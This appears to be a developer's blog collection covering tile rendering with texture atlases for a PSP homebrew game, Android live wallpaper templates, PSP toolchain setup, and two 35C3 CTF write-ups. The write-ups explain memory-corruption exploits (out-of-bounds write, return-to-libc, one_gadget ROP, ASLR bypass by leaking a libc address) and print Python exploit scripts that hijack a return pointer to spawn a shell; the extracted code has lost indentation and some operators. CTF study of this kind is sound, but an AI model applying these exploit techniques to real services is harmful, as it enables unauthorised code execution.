Short story on rendering tiles

Once upon a time in rendering API’s realm

Here I am presenting what is my experiences when implementing one of the base functionalities in Spelunky-PSP which I currently develop – tile rendering.
Featured in narration, as it makes even that dull essay a little bit joyful.

Back to the basics

Say, you want to draw a single, textured tile in terms of OpenGL pipeline. Having done usual boilerplate, by which I mean creating OpenGL context,  loading texture from the filesystem, then uploading to the GPU, obtaining texture ID, binding it to a desired texture slot, writing a dummy shader, compiling, linking vertex and fragment programs, and binding the final product, you finally end up writing the rendering part.

What you need is a frame on which you will stick your texture – so you declare a mesh.
As the tile is a quad, two triangles are pushed to the collection you just created, each of them of three vertices, every described by xy and uv.
Situation is presented by the following image:


You upload the mesh to the GPU, and eventually issue a render call.
Satisfied with results, you go straight for a full tile renderer.
That means, a draw call for a 2D list of 32×24 tiles will be dispatched every frame (your total map size is much bigger, but I assume that you already thought of some optimization and batch only tiles that are in camera viewport). Most of the tiles differ in terms of attached texture, meaning you will have to issue a lot of OpenGL texture binding calls, but you have heard a lot how premature optimization hurts development, so you dismiss the problem.

After briefly writing your proof of concept, you finally run it on the mobile platform you are targeting. Results are puzzling…

It works, but the FPS counter is below expected 60, and that’s not even a full game yet.
One idea comes – how about sorting the batch of tiles to render by the texture attachment ID? That will surely lessen individual texture binding calls.

Again, you apply performance fix to the renderer, and run a profiler.
This time, rendering the very exact scene takes 14 milliseconds. That’s more that 60 FPS!
But what with rendering other entities? Player, mobs, monsters, items, particles?
Desperate for gaining some time buffer for future additions you want to improve your tile renderer.

Optimizing render call

What needs to be achieved is to minimize quantity of texture binding calls, as each of them is considered time-costly.
Sorting did minimize it, but there’s even more effective method: texture atlases.
If you have all your tiles merged into a single texture, you don’t have to issue any individual texture binding calls ever, except one binding call for the tilesheet.

So you end up sticking two tiles together in the image editor of yours, which can be illustrated by the diagram below:


From this example you see the rule for calculating normalized UV for specific tiles.
Before it can be scaled to rendering more than two tiles, few things must be noted:

  • Merging textures together using an image editor is unpleasant and time-costly
  • Manual calculating UV’s for each tile is error-prone and time-costly

Imagine storing an animation for a game character in a manually done spritesheet. Suddenly, adding or removing one frame is a massive enterprise, as it involves re-calculating uv’s by hand and cutting the image.

Surely there must be a piece of software that would automatize the process?

Narrator goes off-topic

There’s a lot of free programs that offer such functionality, and as far as my research goes, atlasc is one that has traits I prefer most.

Written in C, it can be built from source (with CMake as a build system), no external dependencies needed, multiplatform, but what’s most important:

  • It’s command-line.
  • Output image dimensions can be configured. Important on platforms where GPU constraints maximum width/height of uploaded textures, i.e PSP supports up to 512×512 pixels.
  • Outputs image metadata in JSON format. Containing individual image name, width, height, x, y (not normalized) and even mesh with complete index buffer.
  • Padding and border for each sprite can be configured in terms of pixels.
  • Scale of each sprite in output image can be configured

Back on the track

Having all this information, you go and happily merge all your tiles using mentioned atlasc, calling:

atlasc *.png -o level_tiles -B 0 -P 0 -m -W 128 -H 128 -m -2

You modify the game, so it would deserialize outputted JSON in runtime, loading UV’s for each tile, then incorporate them to created mesh.

Your tilesheet looks like this:


Finally, you compile the program, having so far only one texture binding call in its rendering loop, and run it.

As your heartbeat goes up when you see render call time being even smaller than after sorting tiles, while moving camera you discover some problem:


Where did those dark seams between tiles come from?!
There is supposed to be no frames between the question-mark tiles.

Here comes the problem

Initially, you search for source of the problem in texture-loading parts of the code, thinking that texture filtering may cause such artifacts.
As your assets are of pixel-art style, you choose nearest-neighbour filtering, instead of linear one, which interpolates between neighbouring texels leading to blurring those sharp, pixel-art edges.

On the left – nearest neighbour filtering, right – linear filtering. Illustration taken from which I fully recommend.

That gives a hint – as atlasc outputs UV in pixels, and during serialization they are normalized so to pass them to the mesh, probably normalized value goes out of scope of specified tile, bleeding parts of tile that is neighbouring it. Such events are called pixel bleeding.

In case of this question-mark tile, tile that is neighbouring it is a ladder-tile, which would explain bleeding this dark frame (scroll up to the tilesheet and see it!).

As you precisely examine outputted tilesheet in an image editor, it looks like when you’re passing 16×16 tiles, the texture packer cropps them to be 15×15, with UV’s still being of 16×16!

You quickly open an issue on its Github page:
Apply a 1 pixel correction in the packer sources, recompile it, repack tiles, and…



More information on filtering:

Pixel bleeding case, but when using linear filtering:
If I was to write non-pixel-art renderer and utilize linear filtering, and half-pixel-correction would not work, I would fight pixel-bleeding by scaling tiles up on output (feature offered by atlasc), and, when normalizing coordinates, move UV’s by one pixel inwards the tile.
Some very little parts of the image would be lost, but the damage would be minimized by scaling.

The offbeat art of Android live wallpapers

Whether as a mean of utilitarism or pure visual amusement, for a long time live wallpapers felt for me like a niche, stigmatized as battery-draining, or just a triviality that is obscured by the fact that there’s no one I know personally who uses them.

Only recently, stumbling upon this pure diamond I found on Github:

h3liveHOMM 3 themed live wallpaper by Ilya Pomaskin. I recommend building from included gradle files, as it worked fine for me.

…and refreshing my memories of playing H3:WOG for hours I asked myself a few questions, including:

  • How exactly do you develop one?
  • What did people already accomplish, in the means of creativity on this field?

Well, the first answer can be handed right away.

It boils down to creating an application that:

  • Runs always, even when in background – achieved by creating a Service
  • Does not create a window on its own, draws on existing surface supplied by the system – achieved by creating a Service, that extends specifically WallpaperService.

Only thing you need to do is to provide implementation for a few methods (i.e runonTouchEvent, onVisibilityChanged) of Android SDK’s abstract classes WallpaperService and WallpaperService.Engine, and update your manifest file.

This can be done in any tool of your choice, as whether you’re developing in Unity, LibGDX or Android Studio, when deploying to Android you can always override default manifest file and provide additional java files.

Actually, it is that simple that I created a repository where I placed template files for live wallpapers using mentioned technologies:

You can clone it and create your live wallpaper right away.
I covered creating those templates in a series of three separate blog posts:

Once you install such application, it will be visible on your device’s wallpaper browser.

Coming into my second question – If it’s easily accessible, then there must be tons of live wallpapers, for which creativity didn’t simply end on:

Let’s take an image, split it into layers, and add the parallax efect!

And it is correct. There’s a wallpaper that takes a GLSL shader on input and uses it as an output. Another one is an iteration of classic 1970 John Conway’s Game of life. The one after draws Conky-like utility information (RAM, CPU, network usage), yet another opens random Wikipedia article (I would fancy one, that would open CPP-reference, though).

ShaderEditor – Allows to input GLSL shader and use it as live wallpaper.
bouncingDvdDVDLiveWallpaper – Just what you see.

Seemingly, making one’s wallpaper is part of self-expression, like wearing that blue shirt with name of a band you like, or customization, that people tend to make when buying smartphone cases.

FlowersSpaceBattleBe careful, there’s a space battle going on!

I offer no conclusion other, than it is a satisfying weekend project to do, when your current project extends to many months and pulls you down.

Creating live wallpaper in Unity

This post is part of my series on Android live wallpapers.
Visit my other blog posts where I cover creating live wallpapers in:

Templates for all three technologies are on my repository:

After covering live wallpapers in Android Studio (which I recommend to see, for the sake of having reference to the concepts I will use in this post) I had some understanding of what I want to do in Unity, which was:

  • Overriding default AndroidManifest.xml that Unity creates
  • Add one custom Java class, that I will reference from overriden manifest
  • Add another resource xml file

Additionally, as Unity creates its own Activity when exporting as Android Project, I wanted to reference that activity from my Service declared in Java class, so I could render Unity scene when running as wallpaper.

So I created a clean new Unity project and set-up building to Android.

After quick Googling it looked adding my custom Android-specific code to Unity project will be essentially… Creating Assets/Plugins/Android directory (from root of the project) and copying my files there.

When listing files from that directory:


So what I did was copying res, *.java files from of my Android Studio project, omitting, as Unity provides its own Activity.

I also omitted AndroidManifest.xml file – as the one provided by Unity (when exporting as Android project) was a bit bloated and it would be more efficient to just copy very specific content that I needed into Unity’s – I copied whole service tag from my Android Studio project and uses-feature tag.

What was still needed at this point is to reference Unity’s activity to render the scene.
As normally I don’t use Unity I gave up after some time and found out existing wallpaper service that utilizes Unity’s activity by PavelDoGreat:

Keeping package name consistent within Unity and overriden classes that I supplied was essential, otherwise some symbols can be undefined.

You can set package name in Unity’s:
Edit -> Project Settings -> Player.

What then? Just hit Unity’s Build and run.

Creating live wallpaper in LibGDX

This post is part of my series on Android live wallpapers.
Visit my other blog posts where I cover creating live wallpapers in:

Templates for all three technologies are on my repository:

Creating a live wallpaper in LibGDX is only a step further from creating one with Android Studio’s no-activity template (I suggest having a look at my post covering it, as I will mention concepts that I explain there).

There’s a service, but it does not extend directly from WallpaperService – it does from LibGDX’s AndroidLiveWallpaperService, that in fact goes from WallpaperService.

There’s no simple Activity that extends from Activity – there’s one that extends from AndroidApplication.

There’s AndroidManifest.xml with the very same changes as in case of Android Studio project, and drawing happens in LibGDX’s core project (as LibGDX is multi-platform it generates android/ios/core/desktop/html projects, where core shares common part and other are mostly stubs for launching on specific platform).

Creating live wallpaper in Android Studio

This post is part of my series on Android live wallpapers.
Visit my other blog posts where I cover creating live wallpapers in:

Templates for all three technologies are on my repository:

Open your Android Studio, then on your menu bar, select:

File -> New Project -> Add No Activity.

Just like in the image below:
Then, name your application as you wish and choose Java as a language (could be in Kotlin, won’t differ in basis of what I cover in this post).
Click finish when you’re done.

Open Project view on your left-side menu, and in path:


Create files:

Just like on the image below:


Why do we need an Activity and a Service? Android SDK defines them as:

An Activity is a single, focused thing that the user can do. Almost all activities interact with the user, so the Activity class takes care of creating a window for you in which you can place your UI with setContentView(View). (…)
The Activity class is an important part of an application’s overall lifecycle, and the way activities are launched and put together is a fundamental part of the platform’s application model. For a detailed perspective on the structure of an Android application and how activities behave, please read the Application Fundamentals and Tasks and Back Stack developer guides.

Service is an application component that can perform long-running
operations in the background, and it doesn’t provide a user interface.
Another application component can start a service, and it continues to run
in the background even if the user switches to another application.
Additionally, a component can bind to a service to interact with it
and even perform interprocess communication (IPC). For example, a service
can handle network transactions, play music, perform file I/O, or interact
with a content provider, all from the background.

So adding a single Activity is required, and Services are optional and needed in special cases.

From Service’s description one can understand, why is it that live wallpapers need them:
they have to do work in background, unlike most of other Android applications or games.

SDK provides special kind of Service – WallpaperService, that once implemented, will do the effort of drawing when visible.

Documentation describes it as:

A wallpaper service is responsible for showing a live wallpaper behind applications that would like to sit on top of it. This service object itself does very little — its only purpose is to generate instances of Engine as needed. Implementing a wallpaper thus involves subclassing from this, subclassing an Engine implementation, and implementing onCreateEngine() to return a new instance of your engine.

Now, knowing what the files we’ve just created are supposed to contain, let’s provide some source. will be as simple, as:

simplewallpaperactivity…since we don’t need our wallpaper to contain any UI, when running as an application (yes, it will still be runnable and visible in your device’s apps list, and besides, this activity will be run when user requests wallpaper’s settings, as you will find out later).

Real work is done in


For simplicity I did not bother to use OpenGL in this example, so you will have to do with draw calls to Android’s Canvas instance.

Instances of NDK’s Handler and Java’s Runner are created to handle drawing outside of overriden methods – handler acts as a queue for draw() commands.

Under src/main/res/xml/ create wallpaper.xml:


The comment I added in the xml itself says everything.
Finally, create AndroidManifest.xml:


There are 3 notable points in this manifest file, that distinguish if from an ordinary application:

  • uses-feature tag in line 39, that requires a device capable of live wallpapers
  • service tag starting from line 8, requiring BIND_WALLPAPER permission
  • meta-data tag, that points to the activity that is run when user requests wallpaper’s settings

Now you can build and install the wallpaper.

As I mentioned, code is on my repository:

Starting with PSP homebrew!

Result of 24 first hours with psp toolchain.

Just yesterday, I cloned psptoolchain from Github and built it:
And I’m just fluttered to do some programming on it.
Compiled some of shipped samples and tried it on PPSSPP emulator, also cloned & built Minecraft-PSP:

Had some problems though, i.e samples that were shipped needed a flag to be set in their makefile in order to work properly:


Which I took from one of their issues page:

And in the Minecraft-PSP, I needed to remove linkage with MMIO, since there was no such library provided, and comment out a few functions (which utilized MMIO, but were not called anyway). Here it is:


And the reflections sample:



My 35C3 CTF writeup IV – stringmaster2


Stringmaster2 is a continuation of the previous task, stringmaster1 which I covered here:
I recommend you read it, since I’ll reffer to it in this writeup.

What we find in the distrib folder this time is:


You may wonder why would they include the libc (against which stringmaster2 is linked), but we’ll come to this soon.
Now, to see what changed in the source from stringmaster1:


There are two differences:

  1. Code – There’s no spawn_shell function provided this time – we can’t dump its address and overwrite return pointer from the play function with it.
  2. Security measures – Binary is compiled with PIE and stack protector enabled.

PIE stands for Position Independent Executable – which relates to PIC – Position Independent Code, since PIE’s are entirely made from PIC.
On how does it work, you may check on Wikipedia, but what does it change in the context of solving this CTF is:

  • Even if we had the spawn_shell function ready in the binary, this time we couldn’t use its absolute address dumped from the binary like in 1996 task.
  • We can’t just breakpoint at arbitrarily given address using gdb – though we could fix it by recompiling our local stringmaster2 binary if we really wanted to do some inspection.

If stack protector is enabled, on stack frame, before return address and (optionally) frame pointer, there will be placed another value called stack canary. Since buffer overflow attack to redirect code execution, like in the 1996’s writeup, causes overwriting bytes starting at some variable’s address on the stack to the return pointer, values in between will be overwritten, and thus stack canary will change its value.
Compiler will inject code that checks if that value changed, and if so, it will close program to prevent exploiting.
You can read more on that on the Wikipedia:

But the good news is – those make no obstacles, since like in stringmaster1, we can overwrite arbitrary bytes on the stack frame, so the canary value won’t be overwritten untill we specifically do it, and for the PIC problem – we don’t have the spawn_shell function in the binary anyway, thus we’ll need to return somewhere else – but where will we?

Return to libc

Return to libc (r2libc) technique bases on replacing return pointer’s value with an address from the C library – it may be execve function, the same which was called in spawn_shell in stringmaster1, it may be any other function or even a specific line of code within those functions!
Calling execve this way would involve overwriting:


  1. Return pointer, previously storing an address of a line in main function, to which call from play will return.
    It would be overwritten with an address of execve function (8 bytes).
  2. Address after that, would need to point to a literal with “/bin/bash” (where would we find it – later) – 8 bytes.
  3. Again, pointer to a literal with “/bin/bash” – 8 bytes.
  4. Pointer to NULL, which would be 8 zeroed bytes.
  5. Again, pointer to NULL – 8 zeroed bytes.

Where can we find execv address?


Where can we wind the “/bin/bash” literal I mentioned?

st rings

It’s in the libc, just like the execv, but how would it manage to get there?

Let’s download libc sources and find out.
I got mine (version 2.27) from

libc_sourcegrep -rni . -e “/bin/sh” causes recursive searching of “/bin/sh” in current path.

As you see, there are some execve calls involving const char literals “/bin/sh” passed as an argument, which means, that those literals will be eventually stored in the .data section of libc .so file, with pointers to them pushed on the stack when one of those specific call happens.
Now, as we know how to manually craft function call to execve with “/bin/bash” as an argument – I will tell you why we won’t do it in this case – though what we’ve learned will come handy, since what we’ll really do is very similar.

See, when last time we did stringmaster1, swapping bytes to make return pointer store value to spawn_shell was very unstable – program crashed at random, and we only tried to swap 8 bytes!
Swapping all bytes from our manually crafted call stack would involve swapping 40 bytes, not mentioning, we would need to have those 40, mostly different values, somewhere on the leaked stack (and that involves a lot of luck).
What if there would be a way to jump directly to the place where execve(“/bin/bash”) is called in the libc (already with the argument on the stack!) just as we’ve seen in libc sources, without planting function arguments?

Return Oriented Progamming

ROP is the technique I’ve just suggested. Find some place in the existing code that you want to execute, get its address and jump to it. Those places that can be jumped to are called ROP gadgets.

We won’t waste time on finding it manually since there is already a tool specifically for finding execve gadget (though, I’ll make another post about this later), it’s called one_gadget and can be downloaded here:

After installation, we’ll call one_gadget with path to our libc as an argument:


That’s it, we’ve been provided with 3 variants, where registers have different values when calling. We’ll use the first once, but it makes us no difference which one we call.

Return to the plan

So we could use the same python exploit we used before, but with another value of return pointer to substitute (this time the gadget instead of spawn_shell), could we?
Er, no. There’s one last thing I didn’t mention – ASLR, which stands for Address Space Layout Randomization.

The gadget’s address we just took from the libc is an absolute address. It’s an address that takes into account only distance from the beginning of the .so file.
It would be valid only if we added the base libc address to it (the address under which libc is loaded in the system), and the base address changes due to ASLR every time we run the application!
See how the base address changes (ldd runs the program and prints addresses in which libraries are loaded):


As an experiment, let’s temporarily disable ASLR and invoke ldd once again:


As you can see, this time addresses don’t change – how easy it would be to exploit without ASLR! We could just take this permanent base libc address, add absolute address of our gadget and run python script that would change return pointer value.

So in what manner do we defeat ASLR?

Let’s have a detailed look on what’s on stack of a very simple program:


I’ve printed first 20 addresses on the stack when I was breakpointed in the main function. As you see, we have plenty of addresses that reffer to the C library!

First one, __libc_csu_init is the frame pointer in our stack frame, second one, <__libc_start_main+231> is the return pointer – the 231 part means that it points to 231-st byte after the beginning of this function. So we return into a libc function, that called our main before, when bootstrapping the process!
If you want some details on why those addresses are here (not of much relevance for further solving of this task), you can see the answer I gave on Stack Overflow:

Same thing happens in stringmaster2 case, we return to the <__libc_start_main+231> too, and what’s nice is this symbol is also leaked in stringmaster2.

Now it’s time to add facts:

  • We need libc base address (to which we’ll add absolute address of our gadget)
  • We have absolute (from gdb) and [base + absolute] address of <__libc_start_main+231> (from leak)
  • We can calculate base address!

Our addresses:

__libc_start_main = 0x21AB0
__libc_start_main + 231 = 0x21B97

At which position will we find  <__libc_start_main+231> in stringmaster2’s leak?
At the same we used before, 18-th octet of leaked data is the return pointer, and program tries to return to the <__libc_start_main+231>.

The final algorithm is the same as in stringmaster1, but adding a step before replacing return pointer, because we need to calculate the value with which we will replace:

  1. Get integer value from 8 bytes starting at (17 * 8) index of leaked bytes array
  2. Substract 0x21B97 from that value and assign it to libc_base
  3. Bytes for further replacing are [libc_base + gadget_addr]

That’s how ASLR can be defeated – by leaking some address from libc that we know what it points to (<__libc_start_main+231> in this case).

Final attack

This time I moved the part which sends commands to Client class, but in its essence, code is almost like stringmaster1, besides calculating libc-base.

import time
import struct
import socket
# For finding hex sequence in given subarray (i.e finding pointers' addresses by their supposed value)
def find_index_of_subarray(arr, subarr):
index = 0
for byte in arr:
if len(arr) index < len(subarr):
return 1
if byte == subarr[0]:
# Checking if arrays are equal
if arr[index:index + len(subarr)] == subarr:
return index
index += 1
return 1
# For returning sub-bytearray of given length at given index of given bytearray:
def get_subarray_at_address(length, index, byte_array):
if index + length > len(byte_array):
return 1
return byte_array[index:index + length]
# For finding byte index for given byte value in given array
# If found value but it is in protected line, pass this line.
def find_byte_index(byte_value, byte_array, protected_lines):
index = 0
for byte in byte_array:
if byte == byte_value:
not_protected_line = True
for line in protected_lines:
if (not (index < line * 8) and not (index > (line + 1) * 8)):
not_protected_line = False
if not_protected_line:
return index
index += 1
return 1
class Client:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
encoding = 'UTF-8'
decode_error_handling = 'ignore'
host = ''
port = 0
last_retrieved_bytes = bytearray(0)
buffer_size = 512
def __init__(self, host, port): = host
self.port = port
def connect(self):
self.sock.connect((, self.port))
def disconnect(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def wait_for_any_input(self):
print('\033[92m' + 'Waiting for any input.' + '\033[0m')
self.last_retrieved_bytes = bytearray(0)
buffer = self.sock.recv(self.buffer_size)
for byte in buffer:
input_as_string = buffer.decode(self.encoding, self.decode_error_handling)
def wait_for_prompt(self):
print('\033[94m' + 'Waiting for prompt.' + '\033[0m')
self.last_retrieved_bytes = bytearray(0)
input_as_string = ''
retrieved_full_prompt = False
ending_normal = 'quit \n> '
ending_quit = 'You lost.'
while not retrieved_full_prompt:
buffer = self.sock.recv(self.buffer_size)
self.last_retrieved_bytes += buffer
input_as_string += buffer.decode(self.encoding, self.decode_error_handling)
retrieved_full_prompt = \
(input_as_string.find(ending_normal) != 1) or (input_as_string.find(ending_quit) != 1)
def retrieved_bytes_truncate_prompt(self):
beginning = 'Enter the command you want to execute:'.encode(self.encoding)
index = find_index_of_subarray(self.last_retrieved_bytes, beginning)
self.last_retrieved_bytes = self.last_retrieved_bytes[:index]
def prettyprint_retrieved_bytes(self):
offset = len(self.last_retrieved_bytes)
line = 1
string = ''
# Don't worry, it's just an ANSI color code
string += '\033[91m'
while offset > 0:
str_line = 'Line ' + str(line).zfill(3) + ': '
if offset >= 8:
for a in range(0, 8):
str_line += '0x' \
+ hex(self.last_retrieved_bytes[a + (line 1) * 8]).replace('0x', '').rjust(2, '0') + \
' '
for a in range(0, offset):
str_line += '0x' \
+ hex(self.last_retrieved_bytes[a + (line 1) * 8]).replace('0x', '').rjust(2, '0') + \
' '
string += str_line + '\n'
offset -= 8
line += 1
string += '\033[0m'
return string
def send(self, command_bytearr):
print('\033[92m' + 'Sending: ' + str(command_bytearr) + '\033[0m')
def send_replace_overflow(self):
self.send('replace X a\n'.encode(self.encoding))
def send_replace(self, char_1, bytearr):
command = ('replace ' + char_1 + ' ').encode(self.encoding)
command += bytearr
command += (' \n').encode(self.encoding)
print('Sending: ' + str(command))
def send_swap(self, index_1, index_2):
self.send(('swap ' + str(index_1) + ' ' + str(index_2) + ' \n').encode(self.encoding))
def send_print(self):
def send_quit(self):
def send_ls(self):
# 17 * 8 is end of the 17-th octet (counting from zero), so practically it's 18-th line
return_pointer_index = 17 * 8
libc_main_231_absolute = 0x21ab0 + 231
client = Client('localhost', 22225)
copy = client.last_retrieved_bytes
libc_main_231_subarray = get_subarray_at_address(8, return_pointer_index, copy)
libc_main_231 = struct.unpack('<Q', libc_main_231_subarray)[0]
print('libc_main_231_addr is : ' + str(hex(libc_main_231)))
libc_base = libc_main_231 libc_main_231_absolute
print('libc base is: ' + str(hex(libc_base)))
gadget_int = 0x4f2c5 + libc_base
print('gadget is: ' + str(hex(gadget_int)))
gadget_bytes = struct.pack('>Q', gadget_int)
# time.sleep(2)
# Firstly, for every byte of gadget, put its value on the beginning of the leaked data
# to make these bytes present on the stack, so we could use swap command in the second next step.
offset = 0
for byte in gadget_bytes:
copy = client.last_retrieved_bytes
s = chr(copy[offset])
bytearr = get_subarray_at_address(1, offset, gadget_bytes)
client.send_replace(s, bytearr)
offset += 1
# m.client.prettyprint_retrieved_bytes()
# Now, for every byte of gadget, swap its value with corresponding return pointer byte
offset = 0
for byte in reversed(gadget_bytes):
print('Swapping: ' + str(hex(byte)))
index = find_byte_index(byte, client.last_retrieved_bytes, [17])
if index == 1:
print('Index for ' + str(byte) + ' not found!')
client.send_swap(return_pointer_index + offset, index)
offset += 1
# m.client.prettyprint_retrieved_bytes()
print('Replaced all bytes for return pointer to libc_system')
print('This should be shell.')
print('Retrieved bytes counter: ' + str(len(client.last_retrieved_bytes)))


So far, it was the most complex task, since it involved:

  • Knowing how libc bootstraps processes – that their flow starts not in your main function, but in _libc_start_main, then it redirects flow to your main, and finally returns to <__libc_start_main+231> in the end, when your main return.
    You can read more on that on this excellent blog:
  • Knowing, that because of ASLR, you can’t just use some address extracted from libc, without knowing the base at which libc is loaded at this current process instance.
  • Knowing about ROP gadgets, since crafting a call stack for execve by yourself is too unstable to work with given commands (swapping/replacing bytes on stack).


If you’re curious how it is, that one process can use libc at different address every instance, but its code itself does not change – read about Global Offset Table and Procedure Linkage Table:

Also, I’ll have a look at this:
since it looks popular and it’ll probably ease solving CTF’s.


My 35C3 CTF writeup III – stringmaster1


As this task is one category higher than the last one (very easy -> easy), I wrote a separate blog post about std::string, as some knowledge about it would be required for this task and I assume you’ve already read it.

After cd-ing to this task’s distrib directory we’ll see a binary and cpp source code, from which we know, that this binary already provides spawn_shell function, though does not call it anywhere, and consists of 2 other functions – play() and main():


As play function contains much boilerplate, I’ll omit the noise and post only the most important code from which we’ll deduce a vector of attack:


Before I tell you how to exploit a vulnerability that is visible on this picture, let’s first run the binary to show what it prints:


As you see, it’s a simple game of making two strings equal by gradually replacing/swapping characters.
Now, going back to the code from the image before – you may have already noticed, that the “replace” command does not provide any sanitization of returned index! If you input a character that does not exist in the string the program searches, it’s going to return std::string::npos, which is 8 bytes, 0xFFFFFFFFFFFFFFFF.

That means, that if we try to access
[string’s data pointer address] + [0xFFFFFFFFFFFFFFFF]
we’re going to end up with…
[string’s data pointer address] – minus one byte!
If you don’t get it, I explained pointer overflow in the post linked above.
As a consequence, we’re going to end up writing in string’s length field’s last byte. That will make string’s length to hold ridiculously high value, and allow us to print more information with “print” command:

You may wonder – what use do I have from this seemingly random data?

Vector of attack – return pointer overflow

This data provides us 2 important facts:

  • position of return pointer from play function;
    we’ll inject address of spawn_shell there.
  • position and value of a set of bytes that we could use with “swap” command;
    we’ll use them to swap bytes of play’s return pointer

Of course, we won’t do this manually as it’s too cumbersome. We’ll write a python script for that, but before, we’ll need 2 another facts that gdb’s going to provide:

  • spawn_shell address
  • address of instruction that comes just after call to play function in main function; it’s going to be the value of return pointer in play function – from that fact we’ll know which bytes to swap to make it return to spawn_shell instead

First one is a simple matter of:


spawn_shell’s address is 0x00000000004011a7 (left padded to 16 bytes since it’s x86_64 platform I’m working on).
In the second one, we’ve got to disassemble main and find the call to the play function:


As you see, return pointer value’s going to be 0x000000000040246d.

Now we have all the information we need; it’s time for the python script.
I won’t comment about it much since it’s self-commenting, but the algorithm is:

  1. Connect to program (it’s running on a Docker image on port 22224)
  2. Wait untill it sends the command prompt text (and do it every sending of some command)
  3. Send ‘replace X a’ – X since there are no upper case characters in those strings so it’s always safe to pick one of those – ‘a’ since the program seemingly doesn’t crush that much with replacing with a’s – but it’s only arbitrary taken character, any other will do.
  4. Send ‘print’ request to get info of what is after string’s local data pointer
  5. Find index of return pointer (0x40246d) in what ‘print’ returned – I found it manually by printing hex of returned data to console before writing the rest of the script and just hardcoded it, but one can easily code searching for.
  6. Find indexes of 0x40, 0x11, 0xa7 bytes. There’s a chance they will be somewhere in program’s memory, there’s a chance they won’t. If not, just restart the exploit, since the stringmaster1 binary is re-spawned every connection.
  7. Replace return pointer bytes with bytes from indexes we’ve found in the last step
  8. Print ‘exit’ to make it return to spawn_shell
  9. Send ‘ls’
  10. Send ‘cat flag.txt’
  11. Pwned

Final attack

import socket
HOST = ''
PORT = 22224
# Indexes of bytes that will be swapped to represent spawn_shell address.
# They may be in the memory proceeding string's local data pointer,
# or they may not – depends on luck. If not, retry.
index_0x40 = -1
index_0x11 = -1
index_0xa7 = -1
# Memory addresses on which swapping with indexes above will be called,
# to overwrite return pointer from play() function.
# We're placing those bytes in reversed order.
# Base offset represents offset from local data pointer in multiples of 8 bytes.
base_offset = 17
offset_0xa7 = (base_offset * 8)
offset_0x11 = (base_offset * 8) + 1
offset_0x40 = (base_offset * 8) + 2
# Last retrieved input from stringmaster1 program, as an array of byte arrays.
# ex. [b'\x00\x00\x00\x00, b'\x11\x11\x23\x32\x53] … etc]
# It's randomly split into chunks, but from experience I can tell that the
# first chunk after 'print' will always be the data proceeding local data pointer.
byte_arr_input = []
# Last retrieved input from stringmaster1 program, as a single UTF-8 string.
# Characters that are not recognized as a UTF-8 character will be replaced by
# U+FFFD replacement character.
string_input = ''
# Set to true, when expecting shell output to be printed.
shell_expected = False
def send_replace(s):
command = 'replace X a\n'
def send_print(s):
command = 'print\n'
def send_swap_0x40(s):
global index_0x11
global index_0xa7
global index_0x40
print('*** Full Data ***')
print('*** Analyzed data ***')
# Only the first chunk of retrieved data is going to by analyzed, since it contains data we requested, without
# the command prompt text ('Enter the command you want to execute:' … etc)
analyzed_bytes = byte_arr_input[0]
print('*** End of data ***')
index_0x40 = search_for_index(0x40, analyzed_bytes)
index_0x11 = search_for_index(0x11, analyzed_bytes)
index_0xa7 = search_for_index(0xa7, analyzed_bytes)
print('0x40: ' + str(index_0x40))
print('0x11: ' + str(index_0x11))
print('0xa7: ' + str(index_0xa7))
if index_0x40 == -1 or index_0x11 == -1 or index_0xa7 == -1:
print('Indexes not found.')
print('Indexes found:')
command = 'swap ' + str(offset_0x40) + ' ' + str(index_0x40) + '\n'
def send_quit(s):
# Printing bytes again for debug purposes, to make sure
# bytes we wanted to change were swapped.
print('*** Full Data ***')
print('*** Analyzed data ***')
analyzed_bytes = byte_arr_input[0]
print('*** End of data ***')
command = 'quit\n'
def send_swap_0x11(s):
global index_0x11
command = 'swap ' + str(offset_0x11) + ' ' + str(index_0x11) + '\n'
def send_ls(s):
global shell_expected
command = 'ls\n'
shell_expected = True
def send_cat_flag(s):
global shell_expected
command = 'cat flag.txt\n'
def send_swap_0xa7(s):
global index_0xa7
command = 'swap ' + str(offset_0xa7) + ' ' + str(index_0xa7) + '\n'
def exec_next_function(client):
global current_command
global commands
if current_command < len(commands):
current_command += 1
return True
return False
def wait_for_input(client):
global byte_arr_input
global string_input
# If shell command output is expected, just read any portion of data that is ready,
# don't look for any line-ending phrases.
if shell_expected:
print('> Shell expected.')
bytes = client.recv(1024)
string_input += bytes.decode('UTF-8', 'replace')
while ((string_input.find('\n>') == -1) or (string_input.find('[4] quit') == -1)) and \
(string_input.find('You lost.') == -1):
bytes = client.recv(1024)
string_input += bytes.decode('UTF-8', 'replace')
string_input = ''
def print_hex_formatted(arr):
offset = len(arr)
line = 1
while offset > 0:
string = 'line: ' + str(line).zfill(3) + ': '
if offset >= 8:
for a in range(0, 8):
string += '0x' + hex(arr[a + (line – 1) * 8]).replace('0x', '').ljust(2, '0') + ' '
for a in range(0, offset):
string += '0x' + hex(arr[a + (line – 1) * 8]).replace('0x', '').ljust(2, '0') + ' '
offset -= 8
line += 1
def search_for_index(char, arr):
for a in range(0, len(arr)):
if arr[a] == char:
return a
return -1
current_command = 0
commands = [
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
client.connect((HOST, PORT))
more_functions = True
while True:
if not more_functions:
more_functions = exec_next_function(client)

screenshot from 2019-01-27 17-11-19


Docker was convenient, but I’ll try to implement hacking the binary without docker; hooking python script to stdout, without sockets, just for further experiments.
Also, my python skills need some improvement.